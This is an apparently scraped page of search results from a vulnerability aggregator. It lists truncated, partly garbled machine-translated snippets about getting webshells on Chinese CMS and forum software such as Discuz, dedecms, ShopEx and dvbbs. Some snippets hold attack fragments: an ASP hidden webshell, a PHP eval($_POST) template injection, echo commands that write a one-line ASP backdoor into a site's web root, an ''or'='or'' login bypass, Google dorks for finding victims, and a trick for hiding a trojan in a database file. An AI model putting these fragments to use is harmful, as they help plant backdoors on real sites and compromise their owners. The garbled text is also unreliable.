Lucene search
K

54 matches found

seebug.org
seebug.org
added 2015/03/24 12:0 a.m.52 views

Qibo Blog 1.0 /blog/require/ajax/ol_module.php 本地文件包含漏洞

/blog/require/ajax/olmodule.phpif$step==2 $uid=$lfjuid; @include"template/space/module/$moduleid.php"; /ÐÂÔö¼ÓµÄÄ£¿éʹ֮¿ÉÒÔÍÏÀ­/ //$ThisModule$moduleid=strreplace'class="head"','class="head" onMouseOver="Drag.inint;"',$ThisModule$moduleid; if!$ThisModule$moduleid...

7.1AI score
Exploits0
myhack58
myhack58
added 2014/01/10 12:0 a.m.28 views

By wave CMS arbitrary file type upload get webshell-vulnerability warning-the black bar safety net

Brief description: There is no uploaded file type is determined, you can directly Upload a dynamic script to get webshell Detailed description: From the official website to download the cms code in the source directory edit directory batupload. aspx file By decompile to see source code as follows...

7.5AI score
Exploits0
seebug.org
seebug.org
added 2013/12/11 12:0 a.m.33 views

discuz!某自带工具可拿shell

简要描述: discuz!某自带工具,由于使用不当,可以造成webshell。 而且经过调查,使用者数量较大。 详细说明: discuz! 安装包中会自带一个转换工具 convert 这个工具由于存在安全问题,可以拿shell 一般存在网站目录 convert 或 utility/convert 而且经过调查,使用数量还是很大的。 使用前题是data目录可写,这也是这个工具的使用前题。 分析: 文件: utility\convert\include\doconfig.inc.php 中 保存配置,跟踪到saveconfigfile...

7.1AI score
Exploits0
myhack58
myhack58
added 2013/09/07 12:0 a.m.43 views

SupeSite 7.5 background upload webshell-vulnerability warning-the black bar safety net

Get the webshell method without any technical content. the. There are many online similar. But, this see online also not, their just at once get a webshell in the process of discovery, so it sends to, Of course, related many examples. For example, the following two. Example 1: the Wordpress...

7.1AI score
Exploits0
myhack58
myhack58
added 2013/01/28 12:0 a.m.40 views

SiteServer CMS 3.5 background upload WEBSHELL-vulnerability warning-the black bar safety net

Version number: SiteServer CMS 3.5 Background,Upload a single GIF format Trojan. Then,through the site, file management,modify the file name,you can modify the picture Trojan horse in the format . aspx Version number: SiteServer CMS 3.5 http://demo2.siteserver.cn/siteserver/login.aspx Account:...

1AI score
Exploits0
myhack58
myhack58
added 2012/10/28 12:0 a.m.48 views

MACCMS PHP version break security dogs background get webshell-vulnerability warning-the black bar safety net

Yesterday run into, the recording process, nothing of the content, similar to articles sure, any resemblance is certainly no coincidence(language is not so good, everyone will see: the Conditions: 1, movie Station is maccms php version. 2, The server install a security Dog. 3, There is a backgrou...

7.3AI score
Exploits0
myhack58
myhack58
added 2012/08/20 12:0 a.m.53 views

WEBSHELL box system V1. 0 Inbox sub-code vulnerability-vulnerability warning-the black bar safety net

/admin/check. asp The detection of the background of the landing place !-- Include File="../conn. asp" - !-- Include File="../inc/checkstr. asp" - % If TrimRequest. Cookies"YBCookies" = "" Then response. Redirect "login. asp" response. End else dim Rs,SQL SQL = "SELECT FROM YBAdmin where...

1.6AI score
Exploits0
myhack58
myhack58
added 2012/04/24 12:0 a.m.29 views

ESHOP network operators treasure Mall 1.0 GetWebshell-vulnerability warning-the black bar safety net

A day Wake up late, get up found on the ground a flyer. See is an online shop. So want to see with what program, find out where to see the html comments,css comments, and file name. Find is ESHOP network operators treasure Mall. google under exploits, found eshop exploits, test the next, not. But...

7.6AI score
Exploits0
myhack58
myhack58
added 2011/07/22 12:0 a.m.20 views

Asprain forum for registered users to upload pictures you can get a webshell-vulnerability warning-the black bar safety net

Asprain is a suitable for all primary and secondary schools, secondary school, technical school, vocational high-building campus Forum, students Forum, some teaching and research departments, companies build internal Forum, IT technology enthusiasts building technology exchange Forum Free Forum...

0.2AI score
Exploits0
myhack58
myhack58
added 2011/06/08 12:0 a.m.28 views

dedecms 5.7 the background to get SHELL vulnerability-vulnerability warning-the black bar safety net

| dedecms 5.7 teach the previous version has been greatly improved, Repair the 5. 6 The following version serious uploaded 0day; and Quite tasteless, the premise is to have background permissions. Since the system comes with a file Manager Plug-In does not filter the file upload and after editing...

7.2AI score
Exploits0
myhack58
myhack58
added 2011/04/10 12:0 a.m.11 views

ShopEx V4. 8(v4. 8 4,v4. 8 5) the background write WebShell-vulnerability warning-the black bar safety net

ShopEx online store system sales platform, is one of the earliest online shop software provider; is currently the shop system continued research and development of the oldest of the company; is currently the shop software domestic the highest market share of the software provider; is currently th...

7.3AI score
Exploits0
myhack58
myhack58
added 2010/11/04 12:0 a.m.21 views

Discuz! 7.2 the following versions and various uc products api interface to Get webshell vulnerability-vulnerability warning-the black bar safety net

For dz, we are more concerned about is to get the shell, but the dz stuff want to take the shell too hard too difficult, on an article at the end of the bedding the next, so this article is also not on the horse after cannon....this vulnerability has been in the discuz! x1 version quietly give up...

7.3AI score
Exploits0
myhack58
myhack58
added 2010/04/11 12:0 a.m.14 views

discuz! 7.0 and below the version background get webshell-vulnerability warning-the black bar safety net

Don't need the founder, you'll need administrator. http://www.fuck.com/admincp.php?action=styles&operation=edit&id=1&adv=1 In the following there is a“custom template variables”, the variable in the fill: PHP code 1. OLDJUN', '9 9 9';eval$POSTcmd;// Replace the contents of whatever the input: 1 1...

0.1AI score
Exploits0
myhack58
myhack58
added 2010/04/01 12:0 a.m.18 views

Hidden WEBSHELL-vulnerability warning-the black bar safety net

%if request. QueryString"hac"="ker" then a=Request. TotalBytes:if a Then b="adodb. stream":Set c=Createobjectb:c. Type=1:c. Open:c. The Write Request. BinaryReada:c. Position=0:d=c. Read:e=chrB1 3&chrB 1 0:f=Instrbd,e:g=Instrbf+1,d,e:set h=Createobjectb:h. Type=1:h. Open:c. Position=f+1:c. Copyto...

0.8AI score
Exploits0
myhack58
myhack58
added 2010/03/30 12:0 a.m.21 views

Dodge ScanWebShell-vulnerability warning-the black bar safety net

Direct access to the xxx. asp? bin=zs will be in the current directory to generate a bin. asp. The connection password for the zs! PS: the file can Dodge ScanWebShell,but the generated bin. asp will be killed,after use please delete the bin. asp! % pass="zs" If request"bin"= pass then shell = "bi...

0.4AI score
Exploits0
myhack58
myhack58
added 2009/09/26 12:0 a.m.18 views

Side note the Echo of the target Station WebShell-vulnerability warning-the black bar safety net

Command format The Echo statement the target Station absolute directory For example: echo ^^%execute request"0"^%^ D:\03389.com\wwwroot\YingMu.asp Such access to the target bin directory it will generate a password of 0 the asp in a word, this method in PHP and other scripting languages are...

1.5AI score
Exploits0
myhack58
myhack58
added 2009/07/05 12:0 a.m.17 views

Echo out WebShell-vulnerability warning-the black bar safety net

On a side note process, you can execute the cmd without permission and relatively low in the case, sometimes you can use this method to help you down the target Station. Command format The Echo statement the target Station absolute directory For example: echo ^^%execute request"0"%^...

0.7AI score
Exploits0
myhack58
myhack58
added 2009/04/07 12:0 a.m.39 views

ECShop shop system<=V2. 6. 2 the background to get webshell-vulnerability warning-the black bar safety net

ECSHOP is an open source free online store system. By the professional development team upgrade and maintenance, to provide you with timely and efficient technical support, you can also according to their own business characteristics of ECSHOP be customized to increase their own store features...

7.5AI score
Exploits0
myhack58
myhack58
added 2008/12/10 12:0 a.m.4369 views

4 5 You can obtain the Webshell program-vulnerability warning-the black bar safety net

1: Go to GoogLe,search some keywords,edit. asp? Korean broiler chickens is more,the majority of MSSQL database! 2,to Google ,site:cq. cn inurl:asp 3, The use of mining chicken and an ASP Trojan. The file name is login. asp ...... The path set is/manage/ The key word is went. asp 'Or'='or'to login...

8.2AI score
Exploits0
myhack58
myhack58
added 2008/11/24 12:0 a.m.29 views

dvbbs7. 0 and 8. 0 access backstage to get webshell-vulnerability warning-the black bar safety net

Create a new database file, named a. mdb Create a new text file, 命名为b.txt and write the word Trojan At the command line enter the command copy a. mdb/b+b. txt/b c. mdb Get the c. mdb is already inserted into the word Trojan in the database Then in the posting the place to upload attachments, the...

0.4AI score
Exploits0
Rows per page
Query Builder